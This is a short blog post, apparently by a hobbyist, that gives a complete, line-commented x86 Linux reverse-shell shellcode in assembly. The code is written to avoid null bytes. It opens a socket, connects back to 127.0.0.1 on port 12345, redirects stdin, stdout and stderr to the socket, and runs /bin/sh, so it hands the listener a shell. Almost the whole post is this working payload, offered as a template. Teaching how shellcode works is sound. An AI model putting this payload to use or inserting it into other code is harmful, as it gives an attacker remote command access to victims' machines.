Aviran

x86 reverse shellcode documented example

by

aviran
in , , ,

Writing a shellcode is hard, documented references are scarce and figuring out how to translate function calls into assembly is a pain. I’m posting here a shellcode I wrote a while back. It’s not a perfect example, it can be shorter and more elegant, but it works and does not contain null bytes – It should get you started if you need help writing your own variety of shellcode.

This is a reverse shell code, it will connect back to 127.0.0.1 on port 12345 hoping to find a listening server and provide a shell.

# x86 linux reverse shellcode example
# aviran.org
 
xor eax, eax        # setting eax,ebx,edx to zero
xor ebx, ebx
xor edx, edx
 
push 0x6            # pushing 6,1,2 to the stack
push 0x1            # these are the values for
push 0x2            # socket(2,1,6)
mov ecx, esp        # set args for call
mov bl, 1           # 1 means socket()
mov al, 0x66        # 0x66 means sys-socket
int 0x80            # call socket()
mov esi, eax        # sockfd
xor ebx, ebx        # ebx = 0
xor ecx, ecx        # ebx = 0
xor edx, edx        # ebx = 0
mov al, 0x66        # socket syscalls
 
push ebx            # padding
push ebx            # padding
mov bl, 0x3         # ebx = 3 = connect()
 
mov dl,0x1          # pushing sockaddr_in into memory
shl edx,24          # IP,Port,AF_INET, cant push word so pushing port and AF_INET together
mov dl,0x7f         # setting edx to be 0x0100007f - 127.0.0.1
push edx
xor edx,edx         # setting edx to be 0x39300002 - port 12345, AF_INET
mov dx,0x3930       # this is done to avoid null bytes
shl edx,16
mov dl,0x2
push edx
 
mov ecx, esp        # saving location of struct
                    # args for connect
push 0x10           # 0x10 size of struct
push ecx            # ecx - pointer to struct
push esi            # esi sockfd
mov ecx, esp       
int 0x80            # call connect
 
xor eax, eax
xor ebx,ebx
xor ecx,ecx
mov ebx,esi         # sockfd
mov al,0x3f         # dup2
mov cl, 0x2         # ecx = 2 = stderr
int 0x80            # call dup2()
 
xor eax, eax
mov al,0x3f
dec cl              # cl = 1 = stdout
int 0x80            # call dup2
 
xor eax, eax
mov al,0x3f
dec cl              # cl = 0 = stdin
int 0x80            # call dup2
 
xor eax,eax         #
xor ecx,ecx         #
xor edx,edx         #
 
mov al,11           # execve
push edx            # push 0 for end of string
push 0x68732f6e     # pushing //bin/sh
push 0x69622f2f
mov ebx, esp        # pointer to string
push edx            # push null
mov edx,esp         # edx is third var, gets null
push ebx            # push var to stack
mov ecx,esp         # set second variable
int 0x80            # make the call